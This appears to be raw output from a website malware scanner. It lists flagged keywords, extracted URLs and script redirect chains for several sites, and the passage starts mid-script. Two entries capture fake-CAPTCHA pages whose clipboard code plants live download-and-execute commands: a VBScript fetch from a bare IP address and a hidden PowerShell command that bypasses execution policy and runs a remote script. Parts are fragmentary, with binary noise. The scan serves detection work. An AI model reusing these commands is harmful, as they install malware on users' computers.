tment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/gTpTIWhbKpxADzTzkcabhXN4/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-H/5bR8BVxoDZIIp1lThX…
Status: ok
(function(){/*

 Copyright The Closure Library Authors.
 SPDX-License-Identifier: Apache-2.0
*/
/*


 Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors
 Licensed under the Apache License, Version 2.0 (the "License");
 you may not use this file except in compliance with the License.
 You may obtain a copy of the License at
     http://www.apache.org/licenses/LICENSE-2.0
 Unless required by applicable law or agreed to in writing, software
 distributed under the ... [truncated]
37
base64
2
redirects
1
redirect follows
7
suspicious keywords

πŸ” Suspicious Keywords 7

captcha-frontend-css
captcha
captcha-js
captcha-js-before
robot
hidden
responseText

🌐 Extracted URLs 180

https://www.evodigital.com.au
https://www.evodigital.com.au/wp-content/themes/evo/img/evo-digital-outsource-seo-company-logo.png
https://www.evodigital.com.au/wp-content/themes/evo/img/evo_favicon.png
https://www.evodigital.com.au/wp-content/themes/evo/css/fontello-embedded.css
https://www.evodigital.com.au/wp-content/themes/evo/css/css-global.css

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
script' ),s0=document.getElementsByTagName( 'script' )[0];
	s1.async = true;
	s1.src = 'https://embed.tawk.to/59af3bf14854b82732fee5f2/default';
	s1.charset = 'UTF-8';
	s1.setAttribute( 'crossorigin','*' );
	s0.parentNode.i
Status: ok
(function(global){
	global.$_Tawk_AccountKey='59af3bf14854b82732fee5f2';
	global.$_Tawk_WidgetId='default';
	global.$_Tawk_Unstable=false;
	global.$_Tawk = global.$_Tawk || {};
	(function (w){
	function l() {
		if (window.$_Tawk.init !== undefined) {
			return;
		}

		window.$_Tawk.init = true;

		var files = [
			'https://embed.tawk.to/_s/v4/app/69e6f4c07ce/js/twk-main.js',
			'https://embed.tawk.to/_s/v4/app/69e6f4c07ce/js/twk-vendor.js',
			'https://embed.tawk.to/_s/v4/app/69e6f4c07ce/js/twk-... [truncated]
23
base64
4
suspicious keywords

πŸ” Suspicious Keywords 4

captcha
Captcha
robot
hidden

🌐 Extracted URLs 180

https://www.maheshwaree.com/xmlrpc.php
https://www.maheshwaree.com/feed/
https://www.maheshwaree.com/comments/feed/
https://www.maheshwaree.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.maheshwaree.com%2F
https://www.maheshwaree.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.maheshwaree.com%2F&#038;format=xml
23
base64
4
suspicious keywords

πŸ” Suspicious Keywords 4

captcha
Captcha
robot
hidden

🌐 Extracted URLs 180

https://www.maheshwaree.com/xmlrpc.php
https://www.maheshwaree.com/feed/
https://www.maheshwaree.com/comments/feed/
https://www.maheshwaree.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.maheshwaree.com%2F
https://www.maheshwaree.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.maheshwaree.com%2F&#038;format=xml
6
clipboard
3
captcha
2
base64
22
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 22

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
You will observe
CAPTCHA
CAPTCHA-verificatie-ID
Robot

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
5
base64
1
redirects
2
redirect chains
4
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
verification-code-bEE4bmZ6Sis0OVNmUDNCTHp3NWF2VmtTOEVZS2tDeThycE1CcFNPZUttcUZVVnBlT01LZlk1UFh1bm1vZDFqUm5ZOU91c3FNMk5rMnh3MWxqNDdNTTh4UUlnRW1RVjJmemdOM1drcEJWWnk2VmdFUWFac05XcWJMOW9BdkFWRFN8NlJHVVdMb21HSEFXRkc0SFErT0N3ODBid0t3MjA3djcwc20yZHhFekdOST0
hidden

🌐 Extracted URLs 75

https://revistadiversidadcultural.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frevistadiversidadcultural.com%2F
https://revistadiversidadcultural.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frevistadiversidadcultural.com%2F&#038;format=xml
https://revistadiversidadcultural.com/wp-includes/blocks/paragraph/style.min.css
https://revistadiversidadcultural.com/wp-content/plugins/ultimate-social-media-icons/css/sfsi-style.css?ver=2.9.7
https://revistadiversidadcultural.com/wp-content/uploads/maxmegamenu/style.css?ver=bf4dee

πŸ” External JavaScript Redirect Chains

Showing first 2 of 2 chains (truncated for performance)

Script: https://www.googletagmanager.com/gtag/js?id=GT-TWZGQPK
Type: base64_payload
Destination (first appearance): https://www.googletagmanager.com:443/
;1k͎~J})
@`}Τ•uO5w\QR>{"origin":"https://www.googletagmanager.com:443","feature":"SharedWorkerExtendedLifetime","expiry":1776729600,"isThirdParty":true}
Script: https://accounts.google.com/gsi/client
Type: base64_payload
Destination (first appearance): https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&dsh=S1076096926%3A1777468815393957&followup=https%3A%2F%2Faccounts.google.com%2F&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AWa2Patrbs83_tpWcsOfcOqOatGr-TICz13X0-_pVFf4BRdnXx0qoLjlmhjgeZbiXLzDNQXAUfB0Rg
F0
}GMzMb`\6nh_3N^zhj2οΏ¬i(WG
v{"origin":"https://accounts.google.com:443","feature":"FedCmContinueOnBundle","expiry":1744675200,"isThirdParty":true}

πŸ›°οΈ Redirect Follower Findings (4)

Source: inline_js
Method: script_src
createElement(s);
                        js.id = id;
                        js.src = "https://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v3.2";
                        fjs.parentNode.insertBefore(js, fjs);
Status: ok
/*1777468698,*/

/**
 * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.
 *
 * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,
 * copy, modify, and distribute this software in source code or binary form for use
 * in connection with the web services and APIs provided by Facebook.
 *
 * As with any software that integrates with the Facebook platform, your use of
 * this software is subject to the Facebook Platform Policy
 * [http://developers.faceboo... [truncated]
Source: inline_js
Method: location_assignment
window.dFlipLocation = 'https://revistadiversidadcultural.com/wp-content/plugins/3d-flipbook-dflip-lite/assets/';
            window.dFlipWPGlobal = {"text":{"toggleSound":"Turn on\/off Sound
Status: ok
Source: external_js
Method: base64_payload
;1k͎~J})
@`}Τ•uO5w\QR>{"origin":"https://www.googletagmanager.com:443","feature":"SharedWorkerExtendedLifetime","expiry":1776729600,"isThirdParty":true}
Status: ok
<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 404 (Not Found)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 ... [truncated]
Source: external_js
Method: base64_payload
Chain: https://accounts.google.com:443/ β†’ https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F β†’ https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&dsh=S1076096926:1777468815393957
F0
}GMzMb`\6nh_3N^zhj2οΏ¬i(WG
v{"origin":"https://accounts.google.com:443","feature":"FedCmContinueOnBundle","expiry":1744675200,"isThirdParty":true}
Status: ok
<!doctype html><html lang="en-US" dir="ltr"><head><base href="https://accounts.google.com/v3/signin/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><script data-id="_gd" nonce="-OC6X_UHK1AA-GSmcdZn1g">window.WIZ_global_data = {"AfY8Hf":false,"DndLYb":"","DpimGf":false,"EP1ykd":["/_/*"],"EaOSAe":"https://kidsmanagement-pa.googleapis.com","FdrFJe":"-8221080385444985601","FoW6je":false,"GWsdKe":"en-US","HAZvpc":"https://accounts.google.com/v3/signin/intersti... [truncated]
2
powershell
6
clipboard
3
captcha
2
base64
27
suspicious keywords
2
high risk

πŸ’» PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

πŸ” Suspicious Keywords 27

cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
You will observe
CAPTCHA

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance)

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 24 additional sites detected.